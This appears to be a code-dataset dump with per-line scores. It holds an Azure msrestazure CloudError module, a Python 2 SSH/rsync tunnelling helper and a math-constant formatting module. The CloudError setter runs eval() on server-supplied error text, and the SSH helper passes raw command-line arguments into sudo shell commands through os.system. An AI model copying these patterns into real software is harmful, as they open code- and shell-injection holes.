""" _validation = {} _attribute_map = { 'error': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'data': {'key': 'values', 'type': '{str}'} } def __init__(self, *args, **kwargs): self.error = None self._message = None self.request_id = None self.error_time = None self.data = None super(CloudErrorData, self).__init__(*args) def __str__(self): """Cloud error message.""" return str(self._message) @classmethod def _get_subtype_map(cls): return {} @property def message(self): """Cloud error message.""" return self._message @message.setter def message(self, value): """Attempt to deconstruct error message to retrieve further error data. """ try: value = eval(value) except (SyntaxError, TypeError): pass try: value = value.get('value', value) msg_data = value.split('\n') self._message = msg_data[0] except AttributeError: self._message = value return try: self.request_id = msg_data[1].partition(':')[2] time_str = msg_data[2].partition(':') self.error_time = Deserializer.deserialize_iso( "".join(time_str[2:])) except (IndexError, DeserializationError): pass class CloudError(ClientException): """ClientError, exception raised for failed Azure REST call. Will attempt to deserialize response into meaningful error data. :param requests.Response response: Response object. :param str error: Optional error message. 
""" def __init__(self, response, error=None, *args): deserialize = Deserializer() self.error = None self.message = None self.response = response self.status_code = self.response.status_code self.request_id = None if error: self.message = error self.error = response else: try: data = response.json() except ValueError: data = response else: data = data.get('error', data) try: self.error = deserialize(CloudErrorData(), data) except DeserializationError: self.error = None try: self.message = self.error.message except AttributeError: self.message = None if not self.error or not self.message: try: content = response.json() except ValueError: server_message = "none" else: server_message = content.get('message', "none") try: response.raise_for_status() except RequestException as err: if not self.error: self.error = err if not self.message: if server_message == "none": server_message = str(err) msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format(response.reason, server_message) else: if not self.error: self.error = response if not self.message: msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format( response.status_code, server_message) super(CloudError, self).__init__(self.message, self.error, *args) def __str__(self): """Cloud error message""" return str(self.message)
[ "# --------------------------------------------------------------------------\n", "#\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "#\n", "# The MIT License (MIT)\n", "#\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"\"Software\"\"), to\n", "# deal in the Software without restriction, including without limitation the\n", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n", "# sell copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "#\n", "# The above copyright notice and this permission notice shall be included in\n", "# all copies or substantial portions of the Software.\n", "#\n", "# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n", "# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n", "# IN THE SOFTWARE.\n", "#\n", "# --------------------------------------------------------------------------\n", "\n", "from requests import RequestException\n", "\n", "from msrest.exceptions import ClientException\n", "from msrest.serialization import Deserializer\n", "from msrest.exceptions import DeserializationError\n", "\n", "\n", "class CloudErrorData(object):\n", " \"\"\"Cloud Error Data object, deserialized from error data returned\n", " during a failed REST API call.\n", " \"\"\"\n", "\n", " _validation = {}\n", " _attribute_map = {\n", " 'error': {'key': 'code', 'type': 'str'},\n", " 'message': {'key': 'message', 'type': 'str'},\n", " 'data': {'key': 'values', 'type': '{str}'}\n", " }\n", "\n", " def __init__(self, *args, **kwargs):\n", " self.error = None\n", " self._message = None\n", " self.request_id = None\n", " self.error_time = None\n", " self.data = None\n", " super(CloudErrorData, self).__init__(*args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return str(self._message)\n", "\n", " @classmethod\n", " def _get_subtype_map(cls):\n", " return {}\n", "\n", " @property\n", " def message(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return self._message\n", "\n", " @message.setter\n", " def message(self, value):\n", " \"\"\"Attempt to deconstruct error message to retrieve further\n", " error data.\n", " \"\"\"\n", " try:\n", " value = eval(value)\n", " except (SyntaxError, TypeError):\n", " pass\n", " try:\n", " value = value.get('value', value)\n", " msg_data = value.split('\\n')\n", " self._message = msg_data[0]\n", " except AttributeError:\n", " self._message = value\n", " return\n", " try:\n", " self.request_id = msg_data[1].partition(':')[2]\n", " 
time_str = msg_data[2].partition(':')\n", " self.error_time = Deserializer.deserialize_iso(\n", " \"\".join(time_str[2:]))\n", " except (IndexError, DeserializationError):\n", " pass\n", "\n", "\n", "class CloudError(ClientException):\n", " \"\"\"ClientError, exception raised for failed Azure REST call.\n", " Will attempt to deserialize response into meaningful error\n", " data.\n", "\n", " :param requests.Response response: Response object.\n", " :param str error: Optional error message.\n", " \"\"\"\n", "\n", " def __init__(self, response, error=None, *args):\n", " deserialize = Deserializer()\n", " self.error = None\n", " self.message = None\n", " self.response = response\n", " self.status_code = self.response.status_code\n", " self.request_id = None\n", "\n", " if error:\n", " self.message = error\n", " self.error = response\n", " else:\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " data = response\n", " else:\n", " data = data.get('error', data)\n", " try:\n", " self.error = deserialize(CloudErrorData(), data)\n", " except DeserializationError:\n", " self.error = None\n", " try:\n", " self.message = self.error.message\n", " except AttributeError:\n", " self.message = None\n", "\n", " if not self.error or not self.message:\n", " try:\n", " content = response.json()\n", " except ValueError:\n", " server_message = \"none\"\n", " else:\n", " server_message = content.get('message', \"none\")\n", " try:\n", " response.raise_for_status()\n", " except RequestException as err:\n", " if not self.error:\n", " self.error = err\n", " if not self.message:\n", " if server_message == \"none\":\n", " server_message = str(err)\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(response.reason, server_message)\n", " else:\n", " if not self.error:\n", " self.error = response\n", " if not self.message:\n", " msg = \"Operation failed with status: {!r}. 
Details: {}\"\n", " self.message = msg.format(\n", " response.status_code, server_message)\n", "\n", " super(CloudError, self).__init__(self.message, self.error, *args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message\"\"\"\n", " return str(self.message)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
157
0
false
#!/usr/bin/python # -*- coding: utf8 -*- # (c) Fábio Rodrigues Ribeiro - http://farribeiro.blogspot.com # Copying and distribution of this file, with or without modification, are permitted # in any medium without royalty provided the copyright notice and this notice are # preserved. This file is offered as-is, without any warranty. # Este script tem objetivo de simplificar os comandos do SSH # Opções usadas no ssh # -C Compactação # -L ligacao em um host e porta atrás do SSH # -N não executa comandos import os import sys class shpy: # host = None # alvo = None # gateway = None porta_localhost = "5000" default_cmd = "sudo ssh -fCN" def dynamic_bridge(self, host): os.system(self.default_cmd+"D " + self.porta_localhost + " " + host) print "Configure seu navegador para usar sockets no endereço 127.0.0.1:" +self.porta_localhost def forward(self, gateway, alvo): # alvo = sys.argv[4] # sintaxe 0.0.0.0:0000 os.system(self.default_cmd+"L "+ self.porta_localhost +":"+ alvo + " " + gateway) print "Apontar aplicativo para 127.0.0.1:"+self.porta_localhost # def reverse(self, host): # os.system(self.default_cmd+"R "+host) def kill(self): os.system("sudo killall ssh") print "Matando processo... 
ok" def rsync_cp(self, caminho_host, caminho): os.system("sudo rsync -avz "+ caminho +" -e ssh://"+caminho_host) # rsync -avz /home -e ssh://user@0.0.0.0:/path def argumentos(self): print "Faltando argumentos" def __init__(self): opcao = sys.argv[1] if(opcao == "dbg"): # if (sys.argv[1] or sys.argv[2] == None): # self.argumentos() # else: self.dynamic_bridge(sys.argv[2]) elif(opcao == "frw"): self.forward(sys.argv[2], sys.argv[3]) elif(opcao == "sh"): os.system("sudo ssh -C "+sys.argv[2]) # elif(opcao == "rev"): # self.reverse(sys.argv[2]) elif (opcao == "kill"): self.kill() elif (opcao == "cp"): self.rsync_cp(sys.argv[2], sys.argv[3]) else: print "\ Sintaxe: shg.py [option] <host> \n\n\ Options:\n\ --------\n\ dbg\t\tDynamic bridge\n\ frw\t\tTuneling and forwarding\n\ kill\t\tKill the all ssh process\n\ Any option\tPrint this help\n\n\ Enjoy with the tool!" #rev\t\tReverse tuneling\n\ s = shpy()
[ "#!/usr/bin/python\n", "# -*- coding: utf8 -*-\n", "\n", "# (c) Fábio Rodrigues Ribeiro - http://farribeiro.blogspot.com\n", "\n", "# Copying and distribution of this file, with or without modification, are permitted\n", "# in any medium without royalty provided the copyright notice and this notice are\n", "# preserved. This file is offered as-is, without any warranty.\n", "\n", "# Este script tem objetivo de simplificar os comandos do SSH\n", "# Opções usadas no ssh\n", "# -C Compactação\n", "# -L ligacao em um host e porta atrás do SSH\n", "# -N não executa comandos\n", "\n", "import os\n", "import sys\n", "\n", "class shpy:\n", "\t# host = None\n", "\t# alvo = None\n", "\t# gateway = None\n", "\n", "\tporta_localhost = \"5000\"\n", "\tdefault_cmd = \"sudo ssh -fCN\"\n", "\n", "\tdef dynamic_bridge(self, host):\n", "\t\tos.system(self.default_cmd+\"D \" + self.porta_localhost + \" \" + host)\n", "\t\tprint \"Configure seu navegador para usar sockets no endereço 127.0.0.1:\" +self.porta_localhost\n", "\n", "\tdef forward(self, gateway, alvo):\n", "\t\t# alvo = sys.argv[4] # sintaxe 0.0.0.0:0000\n", "\t\tos.system(self.default_cmd+\"L \"+ self.porta_localhost +\":\"+ alvo + \" \" + gateway)\n", "\t\tprint \"Apontar aplicativo para 127.0.0.1:\"+self.porta_localhost\n", "\n", "\t# def reverse(self, host):\n", "\t\t# os.system(self.default_cmd+\"R \"+host)\n", "\n", "\tdef kill(self):\n", "\t\tos.system(\"sudo killall ssh\")\n", "\t\tprint \"Matando processo... 
ok\"\n", "\n", "\tdef rsync_cp(self, caminho_host, caminho):\n", "\t\tos.system(\"sudo rsync -avz \"+ caminho +\" -e ssh://\"+caminho_host) # rsync -avz /home -e ssh://user@0.0.0.0:/path\n", "\n", "\tdef argumentos(self):\n", "\t\tprint \"Faltando argumentos\"\n", "\n", "\tdef __init__(self):\n", "\t\topcao = sys.argv[1]\n", "\n", "\t\tif(opcao == \"dbg\"):\n", "\t\t\t# if (sys.argv[1] or sys.argv[2] == None):\n", "\t\t\t\t# self.argumentos()\n", "\t\t\t# else:\n", "\t\t\tself.dynamic_bridge(sys.argv[2])\n", "\t\telif(opcao == \"frw\"):\n", "\t\t\tself.forward(sys.argv[2], sys.argv[3])\n", "\t\telif(opcao == \"sh\"):\n", "\t\t\tos.system(\"sudo ssh -C \"+sys.argv[2])\n", "\t\t# elif(opcao == \"rev\"):\n", "\t\t\t# self.reverse(sys.argv[2])\n", "\t\telif (opcao == \"kill\"):\n", "\t\t\tself.kill()\n", "\t\telif (opcao == \"cp\"):\n", "\t\t\tself.rsync_cp(sys.argv[2], sys.argv[3])\n", "\t\telse:\n", "\t\t\tprint \"\\\n", "Sintaxe: shg.py [option] <host> \\n\\n\\\n", "Options:\\n\\\n", "--------\\n\\\n", "dbg\\t\\tDynamic bridge\\n\\\n", "frw\\t\\tTuneling and forwarding\\n\\\n", "kill\\t\\tKill the all ssh process\\n\\\n", "Any option\\tPrint this help\\n\\n\\\n", "Enjoy with the tool!\"\n", "#rev\\t\\tReverse tuneling\\n\\\n", "\n", "s = shpy()\n" ]
[ 0, 0, 0, 0, 0, 0.011764705882352941, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0.06666666666666667, 0.06666666666666667, 0.05555555555555555, 0, 0.038461538461538464, 0.03225806451612903, 0, 0.030303030303030304, 0.014084507042253521, 0.030927835051546393, 0, 0.02857142857142857, 0.021739130434782608, 0.05952380952380952, 0.015151515151515152, 0, 0.03571428571428571, 0.023809523809523808, 0, 0.058823529411764705, 0.03125, 0.030303030303030304, 0, 0.022727272727272728, 0.043478260869565216, 0, 0.043478260869565216, 0.03333333333333333, 0, 0.047619047619047616, 0.045454545454545456, 0, 0.045454545454545456, 0.021739130434782608, 0.08333333333333333, 0.09090909090909091, 0.027777777777777776, 0.041666666666666664, 0.023809523809523808, 0.043478260869565216, 0.024390243902439025, 0.038461538461538464, 0.03225806451612903, 0.038461538461538464, 0.06666666666666667, 0.041666666666666664, 0.023255813953488372, 0.125, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.09090909090909091 ]
79
0.024829
false
# -*- coding: utf-8 -*- # IMPORTANT CONFIGURE YOUR TEXT EDITOR/IDE TO utf-8 !!! # @author: "Evert Provoost" # @nickname: "ElecProg" # @pack: "Math Processing Layer (MPL)" # @part: "Visualization system (MPL.V)" # @version: "v5.0.0" # @license: "GNU General Public License v3" from fractions import Fraction from decimal import getcontext, Decimal from .dms import dms as _dms import math import time class dms( _dms): # We would otherwise get a looping import, searching for a fix def str(self, local="all", dec="inf", acc=False, denom=10000, maxCompT=1): deg = visual(self.data[0], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) mnt = visual(self.data[1], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) sec = visual(self.data[2], local, {'dec': dec, 'acc': acc, 'todms': False}, denom, maxCompT / 3) # Yes float since we don't need any precision here. try: if float(deg.replace(',', '.')) < 0: raise ValueError() except ValueError: deg = '(' + deg + ')' try: if float(mnt.replace(',', '.')) < 0: raise ValueError() except ValueError: mnt = '(' + mnt + ')' try: if float(sec.replace(',', '.')) < 0: raise ValueError() except ValueError: sec = '(' + sec + ')' if deg == "0" and mnt == "0" and sec == "0": return "0" + "°" else: outp = "" if not deg == "0": outp = outp + deg + "°" if not mnt == "0": outp = outp + mnt + "'" if not sec == "0": outp = outp + sec + '"' return outp def Pi(): getcontext().prec += 2 lasts, t, s, n, na, d, da = 0, Decimal(3), 3, 1, 0, 0, 24 while s != lasts: lasts = s n, na = n + na, na + 8 d, da = d + da, da + 32 t = (t * n) / d s += t getcontext().prec -= 2 return +s def Tau(): return 2 * Pi() def Phi(): return +((1 + Decimal(5).sqrt()) / 2) def E(): getcontext().prec += 2 i, lasts, s, fact, num = 0, 0, 1, Decimal(1), 1 while s != lasts: lasts = s i += 1 fact *= i s += num / fact getcontext().prec -= 2 return +s def visual(arg, local="all", opt={'dec': 'inf', 'acc': False, 'todms': False}, denom=10000, 
maxCompT=1): quantizefactor = 10**Decimal(-22) if isinstance(arg, bool): return str(arg) elif opt['todms']: return dms(arg).str(local, opt['dec'], denom) elif isinstance(arg, int): return str(arg) arg = Decimal(str(arg)) if arg.is_nan(): return "NaN" elif arg == Decimal("Infinity"): return "+Inf" elif arg == Decimal("-Infinity"): return "-Inf" if not opt['dec'] == "inf" and not opt['acc']: tmp = arg.quantize(10**Decimal(-opt['dec'])) if not math.isnan(tmp): arg = tmp else: # The number is not NaN so it's too big arg = str(arg) arg, exponent = tuple(arg.split('E')) arg = Decimal(arg).quantize(10**Decimal(-opt['dec'])) arg = str(arg) + "E" + exponent elif opt['acc'] and arg < (denom / 100)**3: if Decimal(arg.to_integral_exact()) == arg.quantize(quantizefactor): return str(arg.to_integral_exact()) frac = Fraction(arg).limit_denominator(int(denom)) if (Decimal(frac.numerator) / Decimal(frac.denominator)).quantize( quantizefactor) == arg.quantize(quantizefactor): return str(frac) deno = 1 dent = 1 lst = [] prefix = "" if arg.is_signed(): arg = abs(arg) prefix = "-" pi = Pi() tau = Tau() phi = Phi() e = E() startTime = time.time() while deno <= denom / 100: if time.time() - startTime > maxCompT: break while dent <= denom / 100: frqtn = Decimal(dent) / Decimal(deno) if frqtn not in lst: lst.append(frqtn) argsqr = (arg / frqtn)**2 argcub = (arg / frqtn)**3 argpi = (arg / frqtn) / pi argtau = (arg / frqtn) / tau arge = (arg / frqtn) / e argphi = (arg / frqtn) / phi if argpi.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "pi" elif frqtn == 2: return prefix + "tau" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "pi/" + str(frac.denominator)) elif frac.denominator == 1: return str(prefix + str(frac.numerator) + "pi") else: return str(prefix + str(frac.numerator) + "pi/" + str(frac.denominator)) if argtau.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "tau" else: frac = 
Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "tau/" + str(frac.denominator)) elif frac.denominator == 1: return str( prefix + str(frac.numerator) + "tau") else: return str(prefix + str(frac.numerator) + "tau/" + str(frac.denominator)) elif arge.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "e" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "e/" + str(frac.denominator)) elif frac.denominator == 1: return str(prefix + str(frac.numerator) + "e") else: return str(prefix + str(frac.numerator) + "e/" + str(frac.denominator)) elif argphi.quantize(quantizefactor) == 1: if frqtn == 1: return prefix + "phi" else: frac = Fraction(frqtn).limit_denominator( int(denom)) if frac.numerator == 1: return str( prefix + "phi/" + str(frac.denominator)) elif frac.denominator == 1: return str( prefix + str(frac.numerator) + "phi") else: return str(prefix + str(frac.numerator) + "phi/" + str(frac.denominator)) elif Decimal( argsqr.to_integral_exact()) == argsqr.quantize( quantizefactor): outside_root = 1 inside_root = Decimal(argsqr.to_integral_exact()) d = 2 while (d**2 <= inside_root): if (inside_root % (d**2) == 0): inside_root = inside_root / (d**2) outside_root = outside_root * d else: d = d + 1 outside_root *= frqtn if inside_root == 1: return prefix + str( Fraction(outside_root).limit_denominator( int(denom))) elif outside_root == 1: return ( prefix + "v" + str(argsqr.to_integral_exact())) elif outside_root == 0 or inside_root == 0: return ("0") else: return (prefix + str( Fraction(outside_root).limit_denominator( int(denom))) + "*v" + str(inside_root.to_integral_exact())) elif Decimal( argcub.to_integral_exact()) == argcub.quantize( quantizefactor): outside_root = 1 inside_root = Decimal(argcub.to_integral_exact()) d = 2 while (d**3 <= inside_root): if (inside_root % (d**3) == 0): inside_root = inside_root / (d**3) outside_root = outside_root * d else: d = d + 1 
outside_root *= frqtn if inside_root == 1: return prefix + str( Fraction(outside_root).limit_denominator( int(denom))) elif outside_root == 1: return (prefix + "³v" + str(argcub.to_integral_exact())) elif outside_root == 0 or inside_root == 0: return ("0") else: return (prefix + str( Fraction(outside_root).limit_denominator( int(denom))) + "*³v" + str(int(inside_root))) dent += 1 dent = 1 deno += 1 if not opt['dec'] == "inf": arg = Decimal(str(arg)).quantize(10**Decimal(-opt['dec'])) if prefix == "-": arg = -arg arg = str(arg) arg = arg.rstrip('0').rstrip('.') if '.' in arg else arg if local == "all" or local == "met": arg = arg.replace('.', ',') if local != "py" and arg == "-0": arg = arg.replace('-0', '0') if local == "all" or local == "imp" or local == "met": arg = arg.replace('E+', '*10^') arg = arg.replace('E-', '*10^-') return arg
[ "# -*- coding: utf-8 -*-\n", "# IMPORTANT CONFIGURE YOUR TEXT EDITOR/IDE TO utf-8 !!!\n", "# @author: \"Evert Provoost\"\n", "# @nickname: \"ElecProg\"\n", "# @pack: \"Math Processing Layer (MPL)\"\n", "# @part: \"Visualization system (MPL.V)\"\n", "# @version: \"v5.0.0\"\n", "# @license: \"GNU General Public License v3\"\n", "\n", "from fractions import Fraction\n", "from decimal import getcontext, Decimal\n", "from .dms import dms as _dms\n", "import math\n", "import time\n", "\n", "\n", "class dms(\n", " _dms): # We would otherwise get a looping import, searching for a fix\n", " def str(self, local=\"all\", dec=\"inf\", acc=False, denom=10000, maxCompT=1):\n", " deg = visual(self.data[0], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", " mnt = visual(self.data[1], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", " sec = visual(self.data[2], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", "\n", " # Yes float since we don't need any precision here.\n", " try:\n", " if float(deg.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " deg = '(' + deg + ')'\n", "\n", " try:\n", " if float(mnt.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " mnt = '(' + mnt + ')'\n", "\n", " try:\n", " if float(sec.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " sec = '(' + sec + ')'\n", "\n", " if deg == \"0\" and mnt == \"0\" and sec == \"0\":\n", " return \"0\" + \"°\"\n", "\n", " else:\n", " outp = \"\"\n", "\n", " if not deg == \"0\":\n", " outp = outp + deg + \"°\"\n", "\n", " if not mnt == \"0\":\n", " outp = outp + mnt + \"'\"\n", "\n", " if not sec == \"0\":\n", " outp = outp + sec + '\"'\n", "\n", " return outp\n", "\n", "\n", "def Pi():\n", " getcontext().prec += 2\n", " lasts, t, s, n, na, d, da = 0, Decimal(3), 3, 1, 0, 0, 24\n", " while 
s != lasts:\n", " lasts = s\n", " n, na = n + na, na + 8\n", " d, da = d + da, da + 32\n", " t = (t * n) / d\n", " s += t\n", " getcontext().prec -= 2\n", " return +s\n", "\n", "\n", "def Tau():\n", " return 2 * Pi()\n", "\n", "\n", "def Phi():\n", " return +((1 + Decimal(5).sqrt()) / 2)\n", "\n", "\n", "def E():\n", " getcontext().prec += 2\n", " i, lasts, s, fact, num = 0, 0, 1, Decimal(1), 1\n", " while s != lasts:\n", " lasts = s\n", " i += 1\n", " fact *= i\n", " s += num / fact\n", " getcontext().prec -= 2\n", " return +s\n", "\n", "\n", "def visual(arg,\n", " local=\"all\",\n", " opt={'dec': 'inf',\n", " 'acc': False,\n", " 'todms': False},\n", " denom=10000,\n", " maxCompT=1):\n", " quantizefactor = 10**Decimal(-22)\n", "\n", " if isinstance(arg, bool):\n", " return str(arg)\n", "\n", " elif opt['todms']:\n", " return dms(arg).str(local, opt['dec'], denom)\n", "\n", " elif isinstance(arg, int):\n", " return str(arg)\n", "\n", " arg = Decimal(str(arg))\n", "\n", " if arg.is_nan():\n", " return \"NaN\"\n", "\n", " elif arg == Decimal(\"Infinity\"):\n", " return \"+Inf\"\n", "\n", " elif arg == Decimal(\"-Infinity\"):\n", " return \"-Inf\"\n", "\n", " if not opt['dec'] == \"inf\" and not opt['acc']:\n", " tmp = arg.quantize(10**Decimal(-opt['dec']))\n", " if not math.isnan(tmp):\n", " arg = tmp\n", " else: # The number is not NaN so it's too big\n", " arg = str(arg)\n", " arg, exponent = tuple(arg.split('E'))\n", " arg = Decimal(arg).quantize(10**Decimal(-opt['dec']))\n", " arg = str(arg) + \"E\" + exponent\n", "\n", " elif opt['acc'] and arg < (denom / 100)**3:\n", "\n", " if Decimal(arg.to_integral_exact()) == arg.quantize(quantizefactor):\n", " return str(arg.to_integral_exact())\n", "\n", " frac = Fraction(arg).limit_denominator(int(denom))\n", "\n", " if (Decimal(frac.numerator) / Decimal(frac.denominator)).quantize(\n", " quantizefactor) == arg.quantize(quantizefactor):\n", " return str(frac)\n", "\n", " deno = 1\n", " dent = 1\n", " lst = []\n", " 
prefix = \"\"\n", "\n", " if arg.is_signed():\n", " arg = abs(arg)\n", " prefix = \"-\"\n", "\n", " pi = Pi()\n", " tau = Tau()\n", " phi = Phi()\n", " e = E()\n", "\n", " startTime = time.time()\n", "\n", " while deno <= denom / 100:\n", "\n", " if time.time() - startTime > maxCompT:\n", " break\n", "\n", " while dent <= denom / 100:\n", " frqtn = Decimal(dent) / Decimal(deno)\n", "\n", " if frqtn not in lst:\n", " lst.append(frqtn)\n", " argsqr = (arg / frqtn)**2\n", " argcub = (arg / frqtn)**3\n", " argpi = (arg / frqtn) / pi\n", " argtau = (arg / frqtn) / tau\n", " arge = (arg / frqtn) / e\n", " argphi = (arg / frqtn) / phi\n", "\n", " if argpi.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"pi\"\n", "\n", " elif frqtn == 2:\n", " return prefix + \"tau\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"pi/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(prefix + str(frac.numerator) + \"pi\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"pi/\" + str(frac.denominator))\n", "\n", " if argtau.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"tau\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"tau/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(\n", " prefix + str(frac.numerator) + \"tau\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"tau/\" + str(frac.denominator))\n", "\n", " elif arge.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"e\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"e/\" + str(frac.denominator))\n", "\n", " elif 
frac.denominator == 1:\n", " return str(prefix + str(frac.numerator) + \"e\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"e/\" + str(frac.denominator))\n", "\n", " elif argphi.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"phi\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"phi/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(\n", " prefix + str(frac.numerator) + \"phi\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"phi/\" + str(frac.denominator))\n", "\n", " elif Decimal(\n", " argsqr.to_integral_exact()) == argsqr.quantize(\n", " quantizefactor):\n", " outside_root = 1\n", " inside_root = Decimal(argsqr.to_integral_exact())\n", " d = 2\n", "\n", " while (d**2 <= inside_root):\n", " if (inside_root % (d**2) == 0):\n", " inside_root = inside_root / (d**2)\n", " outside_root = outside_root * d\n", "\n", " else:\n", " d = d + 1\n", "\n", " outside_root *= frqtn\n", "\n", " if inside_root == 1:\n", " return prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom)))\n", "\n", " elif outside_root == 1:\n", " return (\n", " prefix + \"v\" + str(argsqr.to_integral_exact()))\n", "\n", " elif outside_root == 0 or inside_root == 0:\n", " return (\"0\")\n", "\n", " else:\n", " return (prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom))) + \"*v\" +\n", " str(inside_root.to_integral_exact()))\n", "\n", " elif Decimal(\n", " argcub.to_integral_exact()) == argcub.quantize(\n", " quantizefactor):\n", " outside_root = 1\n", " inside_root = Decimal(argcub.to_integral_exact())\n", " d = 2\n", "\n", " while (d**3 <= inside_root):\n", " if (inside_root % (d**3) == 0):\n", " inside_root = inside_root / (d**3)\n", " outside_root = outside_root * d\n", "\n", " else:\n", " d = d + 1\n", "\n", " outside_root *= 
frqtn\n", "\n", " if inside_root == 1:\n", " return prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom)))\n", "\n", " elif outside_root == 1:\n", " return (prefix + \"³v\" +\n", " str(argcub.to_integral_exact()))\n", "\n", " elif outside_root == 0 or inside_root == 0:\n", " return (\"0\")\n", "\n", " else:\n", " return (prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom))) + \"*³v\" +\n", " str(int(inside_root)))\n", "\n", " dent += 1\n", "\n", " dent = 1\n", " deno += 1\n", "\n", " if not opt['dec'] == \"inf\":\n", " arg = Decimal(str(arg)).quantize(10**Decimal(-opt['dec']))\n", "\n", " if prefix == \"-\":\n", " arg = -arg\n", "\n", " arg = str(arg)\n", " arg = arg.rstrip('0').rstrip('.') if '.' in arg else arg\n", "\n", " if local == \"all\" or local == \"met\":\n", " arg = arg.replace('.', ',')\n", "\n", " if local != \"py\" and arg == \"-0\":\n", " arg = arg.replace('-0', '0')\n", "\n", " if local == \"all\" or local == \"imp\" or local == \"met\":\n", " arg = arg.replace('E+', '*10^')\n", " arg = arg.replace('E-', '*10^-')\n", "\n", " return arg\n" ]
